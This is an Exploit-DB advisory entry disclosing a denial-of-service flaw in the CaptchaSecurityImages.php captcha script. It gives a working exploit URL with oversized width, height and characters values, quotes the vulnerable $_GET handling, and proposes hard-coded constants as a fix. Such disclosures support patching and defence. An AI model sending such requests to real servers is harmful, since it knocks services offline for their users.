PHP Captcha Security Images - Denial of Service

EDB-ID:

11397

CVE:

N/A


Author:

cp77fk4r

Type:

dos


Platform:

PHP

Date:

2010-02-11


# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
##[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vuln code is: (lines 73-75)
#
$width = isset($_GET['width']) ? $_GET['width'] : '120';
$height = isset($_GET['height']) ? $_GET['height'] : '40';
$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6';
#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:
#
$width=100;
$height=40;
$characters=5;
#
#
#[e0f]